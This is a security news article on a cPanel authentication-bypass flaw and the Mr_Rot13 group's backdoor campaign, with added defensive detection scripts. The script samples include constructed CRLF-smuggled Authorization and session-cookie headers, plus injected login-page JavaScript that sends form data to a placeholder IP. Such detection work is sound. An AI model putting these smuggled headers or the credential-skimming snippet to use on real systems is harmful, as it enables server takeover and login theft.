Mr_Rot13 exploits critical flaw in cPanel and installs silent backdoor
A serious flaw in cPanel is being exploited by a group of hackers that has been operating almost unnoticed for years. CVE-2026-41940 allows attackers to take control of hosting panels without a password. Thousands of servers have already been affected.
If you manage Linux servers with cPanel, you need to act now. The problem isn't just theoretical: groups like Mr_Rot13 are deploying persistent remote access tools.
- CVE-2026-41940 is a critical authentication bypass (CVSS 9.8) that does not require credentials.
- The Mr_Rot13 group uses the flaw to install the Filemanager backdoor and steal credentials.
- More than 2,000 different IPs have already been seen exploiting the vulnerability globally.
- Official cPanel updates are now available and cover most servers.
- Servers not updated remain at high risk of complete takeover.
How CVE-2026-41940 allows passwordless access
The vulnerability arises in the way cPanel manages sessions: a code path that handles HTTP Basic authentication does not properly sanitize header data, so an attacker can inject control characters (a CRLF sequence) through HTTP headers and smuggle crafted data into the server's handling of the request.
With a specially constructed request, the attacker can create a valid session as an administrator without ever providing a login or password. This gives full access to WHM and all hosted accounts.
Profile and tactics of the Mr_Rot13 group
Mr_Rot13 is not an opportunistic script kiddie. The group has been operating since at least 2020 while attracting little attention from security tools. It uses ROT13 encoding to hide command-and-control addresses and Telegram channels for data exfiltration.
After gaining access via CVE-2026-41940, the group deploys a Go infector that changes the root password, adds SSH keys and installs webshells. The objective is to keep access for the long term.
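Because the report singles out ROT13-obfuscated C2 addresses, a quick triage trick is to extract printable strings from a suspect binary, ROT13 each one and keep those that turn into a hostname or URL. The script below is an added example, not code from the XLab report; the sample blob, the hostnames and the Telegram bot URL inside it are constructed placeholders, and the TLD allowlist is a heuristic assumption to keep random output from flooding the results.

```python
import codecs
import re

# Heuristic TLD allowlist (assumption): ROT13 of random text often yields
# "word.xyz"-looking strings; restricting the TLD keeps the hit list short.
KNOWN_TLDS = {"com", "net", "org", "io", "ru", "cn", "info", "xyz", "top", "me"}

# Hostname or URL: optional scheme, dotted labels, a TLD, optional port and path.
_INDICATOR = re.compile(
    r"(?:https?://)?((?:[a-z0-9-]+\.)+)([a-z]{2,})(?::\d{1,5})?(?:/\S*)?",
    re.IGNORECASE,
)

# Constructed sample "binary": ELF-like noise plus two ROT13-encoded indicators.
#   uggcf://ncv.gryrtenz.bet/obg123:NOP/fraqQbphzrag -> https://api.telegram.org/bot123:ABC/sendDocument
#   hcqngr.rknzcyr-pqa.arg                           -> update.example-cdn.net
SAMPLE_BLOB = (
    b"\x7fELF\x02\x01\x01\x00" + b"\x00" * 8
    + b"/tmp/.x\x00"
    + b"uggcf://ncv.gryrtenz.bet/obg123:NOP/fraqQbphzrag\x00"
    + b"GET / HTTP/1.1\x00"
    + b"hcqngr.rknzcyr-pqa.arg\x00"
    + b"nohup\x00"
)


def extract_strings(blob: bytes, min_len: int = 6) -> list[str]:
    """Printable-ASCII runs of at least min_len bytes, like the `strings` tool."""
    return [m.group().decode("ascii") for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, blob)]


def rot13(s: str) -> str:
    return codecs.decode(s, "rot_13")


def looks_like_indicator(s: str) -> bool:
    """True when the whole string is a hostname/URL with an allowlisted TLD."""
    m = _INDICATOR.fullmatch(s)
    return bool(m) and m.group(2).lower() in KNOWN_TLDS


def hunt_rot13_indicators(blob: bytes, min_len: int = 6) -> list[tuple[str, str]]:
    """Return (encoded, decoded) pairs for strings that become an indicator after ROT13."""
    hits = []
    for raw in extract_strings(blob, min_len):
        decoded = rot13(raw)
        if looks_like_indicator(decoded):
            hits.append((raw, decoded))
    return hits


if __name__ == "__main__":
    for raw, decoded in hunt_rot13_indicators(SAMPLE_BLOB):
        print(f"{raw!r} -> {decoded}")
```

Run it against the output of `strings` on a dropped Go binary and feed the decoded hostnames straight into blocklists and DNS log searches; ROT13 is its own inverse, so the same function decodes and encodes.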
Technical analysis of the exploitation chain
- Bypass authentication: Manipulation of whostmgrsession cookies and Authorization headers with CRLF injection.
- Payload deployment: Shell script downloads a Go binary that runs silently with nohup.
- Multiple persistence: Modification of the root password, an added SSH key and JavaScript injected into the login page.
- Data theft: Collection of bash history, database passwords and configs, sent to remote servers.
- Main backdoor: Filemanager, cross-platform web tool for remote file management and command execution.
Two important insights: the consistent reuse of long-standing infrastructure points to long-term planning, and the combination of several persistence methods makes removal much more complex than simply applying the patch.
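The chain above describes the bypass as CRLF injection through the Authorization header and the whostmgrsession cookie. As an added example (not code from XLab's report or from cPanel), the detector below inspects raw HTTP request captures for the two shapes that claim implies: control characters hidden inside base64-decoded Basic credentials, and percent-encoded CR/LF in the Authorization or Cookie header. The sample requests, hostname and credentials are constructed; the page does not say which cPanel code path decodes these values, so treat this as a triage heuristic for WAF or proxy captures rather than a signature for the vulnerability.

```python
from __future__ import annotations

import base64
import re
from dataclasses import dataclass

# Raw CR/LF/NUL in a value, and their percent-encoded forms (%0d, %0a, %00),
# which a decoder further down the stack may turn back into line breaks.
_RAW_CTRL = re.compile(r"[\r\n\x00]")
_ENCODED_CTRL = re.compile(r"%0[0aAdD]")


@dataclass
class Finding:
    header: str
    reason: str
    value: str


def parse_headers(raw_request: str) -> dict[str, str]:
    """Split the head of a raw HTTP/1.x request into {lowercased name: value}."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    headers: dict[str, str] = {}
    for line in head.split("\r\n")[1:]:  # skip the request line
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def inspect_request(raw_request: str) -> list[Finding]:
    """Flag header values that could smuggle a line break into an auth or session context."""
    findings: list[Finding] = []
    headers = parse_headers(raw_request)
    for name in ("authorization", "cookie"):
        value = headers.get(name)
        if value is None:
            continue
        if _ENCODED_CTRL.search(value):
            findings.append(Finding(name, "percent-encoded CR/LF/NUL in header value", value))
        if _RAW_CTRL.search(value):
            findings.append(Finding(name, "raw control character in header value", value))
    auth = headers.get("authorization", "")
    if auth[:6].lower() == "basic ":
        try:
            creds = base64.b64decode(auth[6:].strip(), validate=True).decode("latin-1")
        except ValueError:
            findings.append(Finding("authorization", "malformed Basic token", auth))
        else:
            if _RAW_CTRL.search(creds):
                findings.append(Finding("authorization", "CR/LF/NUL inside decoded Basic credentials", creds))
    return findings


def scan(requests: list[str]) -> list[tuple[int, list[Finding]]]:
    """Return (index, findings) for every request that produced at least one finding."""
    return [(i, f) for i, r in enumerate(requests) if (f := inspect_request(r))]


def _basic(creds: str) -> str:
    return "Basic " + base64.b64encode(creds.encode("latin-1")).decode("ascii")


# Constructed sample requests (hostname and credentials are placeholders).
_HEAD = "GET /login/ HTTP/1.1\r\nHost: whm.example.com:2087\r\n"
BENIGN = _HEAD + "Authorization: " + _basic("root:correct-horse-battery") + "\r\n\r\n"
# Basic credentials whose decoded form carries a CRLF followed by a forged session cookie.
SMUGGLED_BASIC = _HEAD + "Authorization: " + _basic("root:x\r\nCookie: whostmgrsession=forged") + "\r\n\r\n"
# Session cookie carrying percent-encoded CRLF followed by a forged Authorization header.
ENCODED_COOKIE = _HEAD + "Cookie: whostmgrsession=abc%0d%0aAuthorization: Basic cm9vdDp4\r\n\r\n"

if __name__ == "__main__":
    for idx, found in scan([BENIGN, SMUGGLED_BASIC, ENCODED_COOKIE]):
        for f in found:
            print(f"request {idx}: {f.header}: {f.reason}: {f.value!r}")
```

The decoded-credential check matters because a plain regex over the wire bytes never sees the CRLF: base64 hides it until the server decodes the token, which is exactly where a sanitization gap would bite. A legitimate WHM client has no reason to put control characters in either header, so every finding is worth a ticket.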
Mr_Rot13 versus other active attacks
| Group / Activity | Main Focus | Persistence | Sophistication Level |
|---|---|---|---|
| Mr_Rot13 | Filemanager backdoor + credential theft | High (SSH, PHP, JS, root password) | High - has been operating for 6 years |
| Generic miners | Cryptocurrencies | Average | Below average |
| Opportunistic ransomware | Fast encryption | Low | Average |
| Botnets | Propagation | Average | Low |
Risks and limitations of current protection
Even with the patch applied, servers that were exposed before the update may already be compromised. The official cPanel detection script helps, but doesn't always catch all artifacts.
Main risks: loss of customer data, use of the server as a staging point for larger attacks, reputational damage to the hosting provider, and the difficulty of fully removing Filemanager. Fixes have been backported to some legacy versions, but those servers need extra attention.
Practical immediate protection measures
Update cPanel to a patched version as soon as possible. Block external access to cpsrvd (the cPanel/WHM service on ports 2082/2083 and 2086/2087) where it is not needed, and apply the recommended ModSecurity rules.
Treat any server that was exposed before patching as potentially compromised: run the official detection script, rotate the root password, and review the authorized SSH keys of root and every account. Consider restricting administrative access by source IP.
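Two of the persistence artifacts listed earlier, an added SSH key and JavaScript injected into the login page, can be checked offline once the relevant files are copied off the host. The script below is an added example, not the official cPanel detection script and not from the XLab report: it parses an authorized_keys file, computes OpenSSH-style SHA256 fingerprints and reports keys missing from an allowlist, then lists every inline `<script>` body and every external script whose `src` is not in a baseline. The key blobs, the allowlist, the login page HTML, the baseline script path and the 203.0.113.5 address are all constructed placeholders.

```python
from __future__ import annotations

import base64
import hashlib
import re

# An authorized_keys entry: [options] keytype base64-blob [comment]
_KEY_RE = re.compile(
    r"(?:^|\s)(ssh-(?:rsa|dss|ed25519)|ecdsa-sha2-nistp\d+)\s+([A-Za-z0-9+/=]+)(?:\s+(.*))?$"
)
_SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.IGNORECASE | re.DOTALL)
_SRC_RE = re.compile(r"""src\s*=\s*["']([^"']+)["']""", re.IGNORECASE)


def fingerprint(b64_blob: str) -> str:
    """OpenSSH-style SHA256 fingerprint of a public-key blob (what ssh-keygen -lf prints)."""
    digest = hashlib.sha256(base64.b64decode(b64_blob)).digest()
    return "SHA256:" + base64.b64encode(digest).decode("ascii").rstrip("=")


def parse_authorized_keys(text: str):
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = _KEY_RE.search(line)
        if not m:
            yield {"line": lineno, "issue": "unparseable entry", "raw": line}
            continue
        yield {
            "line": lineno,
            "type": m.group(1),
            "fingerprint": fingerprint(m.group(2)),
            "comment": (m.group(3) or "").strip(),
            "options": line[: m.start()].strip(),  # e.g. from="..." or command="..."
        }


def audit_authorized_keys(text: str, allowed: set[str]) -> list[dict]:
    """Entries needing a human decision: unknown keys, unparseable lines, option-carrying keys."""
    issues = []
    for entry in parse_authorized_keys(text):
        if "issue" in entry:
            issues.append(entry)
        elif entry["fingerprint"] not in allowed:
            issues.append({**entry, "issue": "key not in allowlist"})
        elif entry["options"]:
            issues.append({**entry, "issue": "allowlisted key carries options"})
    return issues


def find_injected_scripts(html: str, baseline_srcs: set[str]) -> list[dict]:
    """Flag inline <script> bodies and external scripts whose src is not in the shipped baseline."""
    findings = []
    for m in _SCRIPT_RE.finditer(html):
        attrs, body = m.group(1), m.group(2).strip()
        src = _SRC_RE.search(attrs)
        if src and src.group(1) not in baseline_srcs:
            findings.append({"kind": "external", "src": src.group(1)})
        elif not src and body:
            findings.append({"kind": "inline", "snippet": body[:80]})
    return findings


def _fake_ed25519_blob(seed: int) -> str:
    """Constructed public-key blob in OpenSSH wire format; not a usable key."""
    key_bytes = hashlib.sha256(seed.to_bytes(4, "big")).digest()
    return base64.b64encode(b"\x00\x00\x00\x0bssh-ed25519\x00\x00\x00\x20" + key_bytes).decode("ascii")


ISSUED_KEY = _fake_ed25519_blob(1)  # the key the team actually deployed
ROGUE_KEY = _fake_ed25519_blob(2)   # what an intruder might append
ALLOWED_FINGERPRINTS = {fingerprint(ISSUED_KEY)}
SAMPLE_AUTHORIZED_KEYS = f"""# /root/.ssh/authorized_keys (constructed sample)
ssh-ed25519 {ISSUED_KEY} ops@bastion
ssh-ed25519 {ROGUE_KEY} root@localhost
"""

# Constructed login page: one legitimate script (hypothetical baseline path) plus an
# inline form-submission hook and an external loader, both pointing at 203.0.113.5.
SAMPLE_LOGIN_HTML = """<html><head><script src="/unprotected/js/login.js"></script></head>
<body><form id="login_form"></form>
<script>
document.getElementById("login_form").addEventListener("submit", function () {
  fetch("https://203.0.113.5/c", {method: "POST", body: new FormData(this)});
});
</script>
<script src="https://203.0.113.5/l.js"></script>
</body></html>"""
BASELINE_SRCS = {"/unprotected/js/login.js"}

if __name__ == "__main__":
    for issue in audit_authorized_keys(SAMPLE_AUTHORIZED_KEYS, ALLOWED_FINGERPRINTS):
        print("authorized_keys:", issue)
    for hit in find_injected_scripts(SAMPLE_LOGIN_HTML, BASELINE_SRCS):
        print("login page:", hit)
```

Build the allowlist from your key inventory, not from the compromised host, and build the script baseline from a freshly installed copy of the same cPanel version; anything that differs is either an undocumented local change or an intruder's. Note that this only covers two of the persistence methods: the root password change and the webshells still need the official detection script and a file-integrity comparison.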
My final opinion on this case
This incident shows how a single critical flaw in a widely used tool can expose entire infrastructures. Mr_Rot13 didn't invent anything revolutionary, but they combined patience, good opsec and opportunistic exploitation effectively.
Administrators and hosting companies need to treat security updates as a top priority, not a routine task. Ignoring this now means paying a high price later.
The Future of Security in Hosting Panels
CVE-2026-41940 served as a strong warning for the cPanel ecosystem. With more than 98% of servers now updated, the focus must shift to detecting previous compromises and strengthening layered defenses.
Groups like Mr_Rot13 will continue to evolve. The best defense remains rapid updating, active monitoring, and reducing the attack surface. Those who act now will be well positioned for the next big incident.
Official Sources
QiAnXin XLab Official Report (primary source)
https://blog.xlab.qianxin.com/mr_rot13-the-elusive-6-year-hacker-group-weaponizing-critical-cpanel-flaws-for-backdoor-deployment/
This is QiAnXin XLab's original detailed report on Mr_Rot13 and the CVE-2026-41940 exploit.
cPanel Security Advisory (vendor official)
https://www.cpanel.net/blog/security/security-update-cve-2026-41940/
cPanel Support - Security Update CVE-2026-41940
https://support.cpanel.net/hc/en-us/articles/40073787579671-Security-CVE-2026-41940-cPanel-WHM-WP2-Security-Update-04-28-2026